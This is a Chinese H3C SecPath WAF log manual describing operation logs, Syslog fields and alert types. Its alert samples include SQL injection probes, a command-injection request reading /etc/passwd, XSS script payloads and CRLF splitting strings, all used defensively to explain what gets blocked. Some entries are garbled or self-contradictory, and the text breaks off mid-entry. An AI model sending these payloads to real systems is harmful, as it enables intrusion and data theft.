H3C SecPath Web应用防火墙日志手册(E6702)-5W101

手册下载

H3C SecPath Web应用防火墙日志手册

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Copyright © 2017 新华三技术有限公司 版权所有,保留一切权利。

非经本公司书面许可,任何单位和个人不得擅自摘抄、复制本文档内容的部分或全部,

并不得以任何形式传播。本文档中的信息可能变动,恕不另行通知。

H3C_彩色.emf

 



1 简介

本文档介绍H3C SecPath Web应用防火墙操作事件信息、Syslog日志信息、告警事件信息,包含日志的参数介绍、产生原因、处理建议等,为用户进行系统诊断和维护提供参考。

2 操作事件

2.1  日志简介

1. 日志信息格式

操作事件是指记录系统用户(包括系统管理员、审计员等)发起的操作的日志,其信息有固定的输出格式,通过了解其格式,可以更好地理解操作事件信息。

操作事件信息的格式如下:

[时间] [操作员用户名] [操作说明] [操作结果状态] [操作员登录IP]

2. 日志参数

操作事件参数说明如2-1所示。

表2-1 日志参数说明

字段名称

字段含义及说明

时间

操作发生的时间,格式:yyyy-mm-dd hh:mm:ss

操作员用户名

执行此操作的系统用户的用户名。

操作说明

所进行操作的相关说明,包括操作的功能和操作的参数描述。

操作结果状态

标识本次操作是否成功。两种取值:

成功。

失败。

操作员登录IP

操作员所登录主机的IP地址。

 

2.2  日志相关操作

1. 日志查看

用户对操作事件进行查看,具体操作步骤如下:

(1)      打开WAFWeb管理界面,通过输入用户名和密码登录界面。

(2)      点击[事件/操作事件],对操作事件进行查看

2. 日志查询

用户可对操作事件进行自定义查询,具体操作步骤如下:

(1)      打开WAFWeb管理界面,通过输入用户名和密码登录界面。

(2)      点击[事件/操作事件],对操作事件进行查看。

(3)      点击[自定义查询]按钮,根据需求设置查询参数,然后点击<执行查询>,如2-1所示。

图2-1 操作事件自定义查询

 

表2-2 自定义查询参数说明

序号

参数名称

参数说明

1

操作关键字

操作的关键字,可输入关键字来查询相关操作。

2

登录IP

操作用户登录WAF管理界面的IP地址,可对某个登录IP的操作进行查询。

3

操作结果

操作结果有成功和出错两种,可对单个操作结果(成功/出错)进行查询。

4

用户

执行此操作的用户名,可对某个用户的操作进行查询。

5

时间范围

操作时间范围,查询某个时间段的操作。

 

3. 导出操作事件

用户可对操作事件进行备份,具体操作步骤如下:

(1)      点击[事件/操作事件]页面,然后点击<导出>按钮。

(2)      在弹出的窗口点击[保存]按钮,在相应的目录下对该日志文件进行备份,如2-2所示。

图2-2 导出操作事件图

 

2.3  日志示例

1. 登录/退出系统

登录系统操作有两种结果,登录成功及失败;退出系统操作只有一种结果,退出成功,日志记录如下:

·              登录系统成功

例如:2013-04-01 15:33:10      admin   登录系统          成功     192.168.19.25

说明:上述操作事件表示2013411533分钟10秒,登录IP192.168.19.25的用户admin登录系统成功。

·              登录系统失败

例如:2013-04-01 17:29:00      admin   登录密码出错   出错     192.168.12.237

说明:上述操作事件表示2013411729分钟00秒,登录IP192.168.12.237的用户admin由于密码错误登录系统失败。

·              退出系统成功

例如:2013-04-01 15:35:10      admin   退出系统          成功     192.168.19.25

说明:上述操作事件表示2013411535分钟10秒,登录IP192.168.19.25的用户admin退出系统成功。

2. 自学习功能

自学习功能有三类操作,事件记录如下:

·              启用

例如:2013-05-06 14:21:05      admin   启用自学习功能            成功     192.168.19.25

说明:上述操作事件表示2013561421分钟05秒,登录IP192.168.19.25的用户admin启用自学习功能成功。

·              配置

例如:2013-05-06 14:21:05      admin   启用自学习功能            成功     192.168.19.25

说明:上述操作事件表示2013561421分钟05秒,登录IP192.168.19.25的用户admin启用自学习功能成功。

·              禁用

例如:2013-05-06 14:23:21      admin   禁用自学习功能            成功     192.168.19.25

说明:上述操作事件表示2013561423分钟21秒,登录IP192.168.19.25的用户admin禁用自学习功能成功。

3. 策略库

策略库有四类操作,事件记录如下:

·              创建策略组

例如:2013-05-19 12:23:21      admin   创建策略组test            成功     192.168.19.25

说明:上述操作事件表示20135191223分钟21秒,登录IP192.168.19.25的用户admin创建策略组test成功。

·              配置策略

例如:2013-05-19 12:26:11      admin   配置策略组       成功     192.168.19.25

说明:上述操作事件表示2013519126分钟11秒,登录IP192.168.19.25的用户admin配置策略组成功。

·              删除规则

例如:2013-05-19 12:31:33      admin   删除策略组       成功     192.168.19.25

说明:上述操作事件表示20135191231分钟33秒,登录IP192.168.19.25的用户admin删除策略组成功。

·              升级规则

例如:2013-05-19 12:33:24      admin   升级策略组       成功     192.168.19.25

说明:上述操作事件表示20135191233分钟24秒,登录IP192.168.19.25的用户admin升级策略组成功。

 

4. 站点侦测

站点侦测有两类操作,事件记录如下:

·              启用站点侦测

例如:2013-04-17 17:08:06      admin   启用站点自动侦测        成功     192.168.12.41

说明:上述操作事件表示2013417178分钟6秒,登录IP192.168.12.41的用户admin启用站点自动侦测成功。

·              禁用站点侦测

例如:2013-04-17 17:08:06      admin   禁用站点自动侦测        成功     192.168.12.41

说明:上述操作事件表示2013417178分钟6秒,登录IP192.168.12.41的用户admin禁用站点自动侦测成功。

5. 防护站点

防护站点有三类操作,事件记录如下:

·              添加

例如:2013-04-17 17:08:06      admin   添加防护站点 149.20.56.33     成功     192.168.12.41

说明:上述操作事件表示2013417178分钟6秒,登录IP192.168.12.41的用户admin添加保护站点149.20.56.33成功。

·              删除

例如:2013-04-17 17:08:06      admin   删除防护站点   成功     192.168.12.41

说明:上述操作事件表示2013417178分钟6秒,登录IP192.168.12.41的用户admin删除保护站点成功。

·              配置

例如:2013-04-17 17:08:06      admin   配置防护站点149.20.56.33     成功     192.168.12.41

说明:上述操作事件表示2013417178分钟6秒,登录IP192.168.12.41的用户admin配置保护站点149.20.56.33成功。

6. 报表操作

报表操作有三类操作,事件记录如下:

·              自定义报表

例如:2013-05-19 19:08:16      admin   创建自定义报表  成功   192.168.12.41

说明:上述操作事件表示2013519198分钟16秒,登录IP192.168.12.41的用户admin创建自定义报表成功。

例如:2013-05-19 19:10:12      admin   查询自定义报表  成功   192.168.12.41

说明:上述操作事件表示20135191910分钟12秒,登录IP192.168.12.41的用户admin查询自定义报表成功。

例如:2013-05-19 19:12:26      admin   删除自定义报表  成功   192.168.12.41

说明:上述操作事件表示20135191912分钟26秒,登录IP192.168.12.41的用户admin删除自定义报表成功。

·              组合报表

例如:2013-05-19 19:16:11      admin   创建组合报表  成功      192.168.12.41

说明:上述操作事件表示20135191916分钟11秒,登录IP192.168.12.41的用户admin创建组合报表成功。

例如:2013-05-19 19:18:12      admin   查询组合报表  成功      192.168.12.41

说明:上述操作事件表示20135191918分钟12秒,登录IP192.168.12.41的用户admin查询组合报表成功。

例如:2013-05-19 19:20:44      admin   删除组合报表  成功      192.168.12.41

说明:上述操作事件表示20135191920分钟44秒,登录IP192.168.12.41的用户admin删除组合报表成功。

·              定时报表

例如:2013-05-19 19:21:09      admin   创建定时报表  成功      192.168.12.41

说明:上述操作事件表示20135191921分钟09秒,登录IP192.168.12.41的用户admin创建定时报表成功。

例如:2013-05-19 19:22:01      admin   查询定时报表  成功      192.168.12.41

说明:上述操作事件表示20135191922分钟01秒,登录IP192.168.12.41的用户admin查询定时报表成功。

例如:2013-05-19 19:23:44      admin   删除定时报表  成功      192.168.12.41

说明:上述操作事件表示20135191923分钟44秒,登录IP192.168.12.41的用户admin删除定时报表成功。

7. 访问控制

访问控制有三类操作,事件记录如下:

·              添加

例如:2013-05-19 15:21:10      admin   添加访问控制名单  成功           192.168.12.41

说明:上述操作事件表示20135191521分钟10秒,登录IP192.168.12.41的用户admin添加访问控制名单成功。

例如:2013-05-19 15:21:55      admin   添加爬虫黑名单  成功   192.168.12.41

说明:上述操作事件表示20135191521分钟55秒,登录IP192.168.12.41的用户admin添加爬虫黑名单成功。

·              编辑

例如:2013-05-19 15:21:10      admin   编辑访问控制名单  成功           192.168.12.41

说明:上述操作事件表示20135191521分钟10秒,登录IP192.168.12.41的用户admin编辑访问控制名单成功。

例如:2013-05-19 15:25:22      admin   编辑爬虫黑名单  成功   192.168.12.41

说明:上述操作事件表示20135191525分钟22秒,登录IP192.168.12.41的用户admin编辑编辑爬虫黑名单成功。

·              删除

例如:2013-05-19 15:25:22      admin   编辑爬虫黑名单  成功   192.168.12.41

说明:上述操作事件表示20135191525分钟22秒,登录IP192.168.12.41的用户admin编辑编辑爬虫黑名单成功。

例如:2013-05-19 15:30:15      admin   删除爬虫黑名单  成功   192.168.12.41

说明:上述操作事件表示20135191530分钟15秒,登录IP192.168.12.41的用户admin删除爬虫黑名单成功。

8. 事件记录

事件记录配置有一类操作,事件记录如下:

·              配置

例如:2013-05-19 15:38:26      admin   配置保护站点日志记录级别  成功         192.168.12.41

说明:上述操作事件表示20135191538分钟26秒,登录IP192.168.12.41的用户admin配置保护站点日志记录级别成功。

9. 事件通知

事件通知配置有一类操作,事件通知如下:

·              配置

例如:2013-05-19 15:40:16      admin   配置告警通知  成功      192.168.12.41

说明:上述操作事件表示20135191540分钟16秒,登录IP192.168.12.41的用户admin配置告警通知成功。

10. 双机热备配置

双机热备配置有一类操作,事件记录如下:

·              配置

例如:2013-05-19 15:45:33      admin  配置双机热备模块  成功             192.168.12.41

说明:上述操作事件表示20135191545分钟33秒,登录IP192.168.12.41的用户admin配置HA模块成功。

11. 资源监控

资源监控有一类操作,事件记录如下:

·              配置

例如:2013-05-19 15:50:27      admin   配置设备自身资源监控选项      成功  192.168.12.41

说明:上述操作事件表示20135191550分钟27秒,登录IP192.168.12.41的用户admin配置设备自身资源监控选项成功。

12. 桥接配置

桥接配置有一类操作,事件记录如下:

·              配置

例如:2013-05-19 15:52:14      admin   配置网桥          成功  192.168.12.41

说明:上述操作事件表示20135191552分钟14秒,登录IP192.168.12.41的用户admin配置网桥成功。

13. 配置管理

配置管理有一类操作,事件记录如下:

·              配置

例如:2013-05-19 15:57:09      admin   导出配置文件   成功  192.168.12.41

说明:上述操作事件表示20135191557分钟09秒,登录IP192.168.12.41的用户admin导出配置文件成功

例如:2013-05-19 15:58:14      admin   导入配置文件   成功  192.168.12.41

说明:上述操作事件表示20135191558分钟14秒,登录IP192.168.12.41的用户admin导入配置文件成功。

14. 切换运行模式

切换运行模式有三类操作,事件记录如下:

·              切换到正常模式

例如:2013-05-19 15:58:09      admin   切换运行模式为正常模式          成功  192.168.12.41

说明:上述操作事件表示20135191558分钟09秒,登录IP192.168.12.41的用户admin切换运行模式为正常模式成功。

·              切换到网桥直通

例如:2013-05-19 15:58:58      admin   切换运行模式为网桥直通          成功  192.168.12.41

说明:上述操作事件表示20135191558分钟58秒,登录IP192.168.12.41的用户admin切换运行模式为网桥直通成功。

·              切换到物理直通

例如:2013-05-19 15:59:44      admin   切换运行模式为物理直通          成功  192.168.12.41

说明:上述操作事件表示20135191559分钟44秒,登录IP192.168.12.41的用户admin切换运行模式为透物理直通成功。

15. 系统设置

系统设置有三类操作,事件记录如下:

·              修改

例如:2013-05-19 16:02:08      admin   修改系统设置   成功  192.168.12.41

说明:上述操作事件表示20135191602分钟08秒,登录IP192.168.12.41的用户admin修改系统设置成功。

·              启用

例如:2013-05-19 16:05:22      admin   启用远程管理   成功  192.168.12.41

说明:上述操作事件表示20135191605分钟22秒,登录IP192.168.12.41的用户admin启用远程管理成功。

·              禁用

例如:2013-05-19 16:05:58      admin   禁用远程管理   成功  192.168.12.41

说明:上述操作事件表示20135191605分钟58秒,登录IP192.168.12.41的用户admin禁用远程管理成功。

16. 用户管理

用户管理有三类操作,事件记录如下:

·              创建

例如:2013-05-19 16:11:09      admin   创建用户          成功  192.168.12.41

说明:上述操作事件表示20135191611分钟09秒,登录IP192.168.12.41的用户admin创建用户成功。

·              编辑

例如:2013-05-19 16:11:27      admin   编辑用户          成功  192.168.12.41

说明:上述操作事件表示20135191611分钟27秒,登录IP192.168.12.41的用户admin编辑用户成功。

·              删除

例如:2013-05-19 16:12:35      admin   删除用户          成功  192.168.12.41

说明:上述操作事件表示20135191612分钟35秒,登录IP192.168.12.41的用户admin删除用户成功。

17. 数据管理

用户管理有一类操作,事件记录如下:

·              配置

例如:2013-05-19 16:13:21      admin   配置告警数据备份        成功  192.168.12.41

说明:上述操作日志表示20135191613分钟21秒,登录IP192.168.12.41的用户admin配置告警数据备份成功。

3 Syslog日志

3.1  日志简介

1. 日志信息格式

Syslog日志是指对外发送Syslog的日志记录(包括告警事件、系统日志等)。

中文日志的格式如下:

[日志接收时间] [发送日志主机名] [发生时间] [威胁] [事件] [请求方法] [URL地址] [POST数据] [服务器IP地址] [服务器主机名] [服务器端口] [客户端IP] [客户端端口] [客户端环境] [标签] [动作] [HTTP/S响应码] [攻击特征串] [触发规则] [访问唯一编号] [国家] [] []

英文日志的格式如下:

[receipt time] [hostname] [happentime] [severity_id] [msg_id] [method] [url] [post] [dip] [hostname] [dport] [sip] [sport] [user_agent] [tag_id] [action_id] [response_code] [match] [rule_id] [unique_id] [country] [province] [city]

2. 日志参数

Syslog日志参数说明如3-1所示。

表3-1 Syslog日志参数说明表

英文字段名

中文字段名

字段取值

说明

第一个字段,日志接收时间。

代表日志接收的时间,格式:mm-dd hh:mm:ss

第二个字段,发送日志主机名。

代表日志发送的源主机名。

happentime

发生时间

yyyy-mm-dd hh:mm:ss

格式如:2012-09-14 04:28:11

severity_id

威胁

英文为数字1-5

威胁等级,1-5 1为最高。

中文依次为:严重、高、中、低、信息。

msg_id

事件

英文为整型值;

用于识别消息类型;中文事件名如:sql注入攻击。

中文为事件类型名称,为中文字符串。

method

请求方法

字符串,长度无限制。

内容为HTTP请求方法名:

GETPOST等等。

url

URL地址

字符串,长度无限制。

攻击使用的URL地址。

post

POST数据

字符串,长度无限制。

请求体内容。

dip

服务器IP

点分十进制ip值。

 

hostname

主机名

ip或域名。

 

dport

服务器端口

十进制端口号。

服务器TCP端口。

sip

客户端IP

 

 

sport

客户端端口

 

客户端TCP端口。

user_agent

客户端环境

客户端信息。

系统信息、浏览器信息等。

tag_id

标签

整型值。

 

action_id

动作

英文为数字123之一。

1阻断,2告警,3放行。

中文为阻断,告警,放行。

response_code

HTTP/S响应码

服务器响应号。

403等。

match

攻击特征串

字符串。

攻击匹配的攻击特征串。

rule_id

触发规则

8位数字。

匹配的策略号。

unique_id

访问唯一编号

长度为24的字符串。

信息唯一编号。

country

国家

字符串。

根据IP得到所在国家。

province

字符串。

所在省。

city

字符串。

所在市。

 

3.2  日志相关操作

(1)      选择[配置/事件通知/通知方式],选择Syslog通知对应的[配置]按钮,填写告警事件和系统事件的接收服务器地址,如3-1所示。

图3-1 Syslog通知配

 

(2)      在配置完相关通知方式后,可配置告警事件的触发条件和通知等级,选择[配置/事件通知/告警配置],启用Syslog通知,必须设置语言类型及编码方式。

字符编码:可选GBKUTF-8,默认设置为GBK

语言为纯英文或中文,现默认配置为中文。

每条日志记录一次攻击的信息,下面按中英文给出信息中各字段的说明。字段取值中若不特别说明,中文与英文情况下取值相同。

(3)      配置完成后通过第三方Syslog服务器接收并查看。

3.3  日志示例

Syslog日志的典型样例,包括:

·              中文样例

May 28 18:52:07 localhost H3CWAF: 发生时间/2012-09-14 04:24:16,威胁/,事件/SQL注入攻

,请求方法/GET,URL地址/192.168.54.184/web/index.asp

?0x0.0000000000001p-1022nd%201=1,POST数据/,服务器IP/192.168.54.184,主机名/192.168.54.184,服务器端口/80,客户端IP/192.168.54.2,客户端端口/63036,客户端环境/Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3),标签/SQL注入攻击,动作/阻断,HTTP/S响应码/403,攻击特征串/and 1=,触发规则/12010070,访问唯一编号/UFJA738AAAEAAfvZGyQAAADC,国家/LAN,/,/

·              英文样例

May 28 18:52:07 localhost H3CWAF: happentime

/2012-09-1404:28:11,severity_id/2,msg_id/12010,method/GET,url/192.168.54.184/web/index.asp?%20and%201=1,post/,dip/192.168.54.184,hostname/192.168.54.184,dport/80,sip/192.168.54.2,sport/63036,user_agent/Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3),tag_id/1201,action_id/1,response_code/403,match/and 1=,rule_id/12010070,unique_id/UFJB238AAAEAAhnOekkAAABO,country/LAN,province/,city/

 

4 告警事件

4.1  事件简介

1. 事件信息格式

告警事件是对攻击事件的记录审计,常见的攻击行为如SQL注入、XSSCSRF等攻击行为都可以通过告警事件进行记录。

告警事件信息的格式如下:

[威胁][事件][客户端][服务器][发生时间][动作]

2. 日志参数

告警事件参数字段说明如4-1所示。

表4-1 告警事件参数字段说明

字段名称

字段含义及说明

威胁

攻击事件的危害等级,以颜色标示。

事件

攻击事件的具体内容。

客户端

攻击者IP地址。

服务器

攻击者攻击对象(服务器)IP地址。

发生时间

攻击事件发生的时间,格式:yyyy-mm-dd hh:mm:ss

动作

当用户访问符合某条规则时,WAF采取的保护措施。

 

4.2  事件相关操作

1. 事件查看

用户对告警事件进行查看,具体操作步骤如下:

(1)      打开WAFWeb管理界面,通过输入用户名和密码登录界面。

(2)      点击[事件 /应用防护],对告警事件进行查看。

(3)      点击某条告警日志查看详细信息。如4-1所示。

图4-1 告警事件详细信息图

 

2. 事件查询

用户对告警事件进行查询,具体操作步骤如下:

(1)      打开WAFWeb管理界面,通过输入用户名和密码登录界面。

(2)      点击[事件 /应用防护],对告警事件进行查看。

(3)      点击<自定义查询>按钮,根据需求设置查询参数,然后点击[执行查询]按钮,如4-2所示。

图4-2 告警事件自定义查询

 

3. 导出告警事件

用户可对告警日志进行备份具体操作步骤如下:

(1)      点击[事件/应用防护/导出]

(2)      在弹出的窗口点击<导出>按钮,如4-3所示。

图4-3 导出告警事件

 

4.3  告警事件示例

1. 协议违规

·              告警解释

检查HTTP协议头部Content-Length值是否为数字。

·              告警事例

POST /test.asp HTTP/1.1

Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, */*

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)

Content-Type: application/x-www-form-URLencoded

Host: 192.168.1.10

Content-Length: 3159

Connection: close

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP协议头部Content-Length值为数字就被阻断。

 

·              对系统的影响

请求被阻断

·              可能的原因

HTTP协议头部Content-Length值为数字。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,

或者将该策略关闭。

2. 协议版本限制

·              告警解释

阻止非http协议版本1.0或者1.1的请求。

·              告警事例

GET / HTTP/0.9

Host: 192.168.12.32

User-Agent: Mozilla/5.0 ( Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/2.3

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-gb,en;q=0.5

tooles:acunetix-product

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

请求包不符合http协议版本为1.0或者1.1就被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

请求包的http协议版本非1.0或者1.1

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

3. 缺失报头告警

·              告警解释

阻止缺失Host字段的HTTP请求

·              告警事例

GET/AppScan_fingerprint/MAC_ADDRESS_0026828BEDE6.html?7CAEB72D HTTP/1.0
Accept-Language: en-US

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

Connection: keep-alive

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

缺失Host字段的HTTP请求被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求缺失Host字段。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

4. HTTP方法限制

·              告警解释

阻止HTTP请求方法,例如TRACEPUTDELETE等。

·              告警事例

OPTIONS / HTTP/1.0

Host: 192.168.12.32

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/2.3

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-gb,en;q=0.5

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP请求方法TRACEPUTDELETE等就被阻断。

 

·              对系统的影响

请求被阻断。

·              可能原因

HTTP请求方法TRACEPUTDELETE等。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

5. 文件限制

·              告警解释

不允许访问的文件类型和不允许请求的文件类型,例如phpincphtm(l).aspasacer

·              告警事例

GET /cgi-bin/test-cgi.bat?|dir HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: hangzhou.baixing.com

Pragma: no-cache

Connection: keep-alive

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP请求包中若包含不允许访问的文件类型和不允许请求的文件类型,例如phpincphtm(l).aspasacer等,就被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求包中包含不允许访问的文件类型和不允许请求的文件类型,例如phpincphtm(l).aspasacer等。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

6. SQL注入攻击

·              告警解释

阻止SQL注入攻击,防'msdasql'特征字符。

·              告警事例

GET /1%2520and%25201%3D2 HTTP/1.0

Host: 192.168.12.32

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/2.3

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-gb,en;q=0.5

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP请求中包含'msdasql'特征字符就被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求中包含'msdasql'特征字符。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

7. 代码注入

·              告警解释

阻止PHP注入攻击,防phpproc_open()函数。

·              告警事例

POST /index.php?v=newtopic&c=1 HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-URLencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: hangzhou.baixing.com

Content-Length: 82

Pragma: no-cache

Connection: keep-alive

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP请求中包含PHPproc_open()函数被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求中包含PHPproc_open()函数。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

8. 命令注入

·              告警解释

阻止参数运用系统shell命令注入,如“wget”等。

·              告警事例

GET /show.asp?id=1306 | cat /etc/passwd HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, image/pjpeg,

application/xaml xml, application/x-ms-xbap, application/x-ms-application,

application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;

Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)

Accept-Encoding: gzip, deflate

Host: 192.168.27.165:8080

Cookie: ASPSESSIONIDAQBBBBAT=GHIJDFGBEBNOHJMFAOMBAHKN

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP请求中包含参数运用系统shell命令注入,如“wget”等被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求中包含参数运用系统shell命令注入,如“wget”等。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

9. 文件注入

·              告警解释

阻止文件注入,对“.htpasswd”文件的尝试。

·              告警事例

GET /httpd.conf HTTP/1.0

Host: 192.168.12.32

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/2.3

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-gb,en;q=0.5

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP请求中包含对“.htpasswd”文件的尝试被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求中包含对“.htpasswd”文件的尝试

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

10. LDAP注入攻击告警

·              告警解释

捕获请求的文件名、参数名和参数包含LDAP注入。

·              告警事例

GET /show.asp?id=1306 HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/xaml xml,!@#$$%&*()*^%$#@!!#$%^&*(&#@!@#%&*(((*%^#@!#$%^&*(*&^%#@!@#$%^&**&^%$#@!@#&*^%$#@!@$%^&*&^%$@ application/x-ms-xbap, application/x-ms-application, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;

Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)

Accept-Encoding: gzip, deflate

Host: 192.168.27.165:8080

Cookie: ASPSESSIONIDAQBBBBAT=GHIJDFGBEBNOHJMFAOMBAHKN; ASPSESSIONIDASCBABAS=IEHFGMGBMJNOGGJNPHKMECLF

Content-Length: 7

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

捕获请求的文件名、参数名和参数包含LDAP注入被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

捕获请求的文件名、参数名和参数包含LDAP注入。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

11. 跨站脚本攻击

·              告警解释

阻止xss注入攻击,防onabort字符。

·              告警事例

GET /%27%3E%3CscRiPT%3Ealert%28%27XssTest%27%29%3C%2FScrIPT%3E HTTP/1.0

Host: 192.168.12.32

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/2.3

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-gb,en;q=0.5

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP请求中包含onabort字符被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求中包含onabort字符。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

12. 针对IE8的跨站攻击

·              告警解释

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

·              告警事例

GET /yearcal.php?ycyear=<script>alert("1253917605");</script> HTTP/1.0

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: hangzhou.baixing.com

Pragma: no-cache

Connection: keep-alive

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP请求中包含<object type=等特征串被阻断.

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求中包含<object type=等特征串。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

13. HTTP请求分割攻击

·              告警解释

阻止HTTP请求分割攻击,Content-LengthTransfer-Encoding分割。

·              告警事例

GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1

Host: vulnerable.example.com

Connection: close

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

HTTP请求中Content-LengthTransfer-Encoding分割被阻断。

 

·              对系统的影响

请求被阻断

·              可能原因

HTTP请求中Content-LengthTransfer-Encoding分割。

·              处理步骤

查看告警日志的详细信息,判断是否为误报,如果是误报,则可以将触发该告警日志的URL放行,或者将该策略关闭。

14. HTTP响应分割攻击

·              告警解释

阻止请求的URLBODY包含HTTP响应分割攻击。

·              告警事例

http://192.168.27.165:8080/show.asp?id=%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%20158%0d%0a%0d%0a帐号%20密码%20

·              告警属性

发生时间

告警级别

事件

格式为

yyyy-mm-dd hh:mm:ss

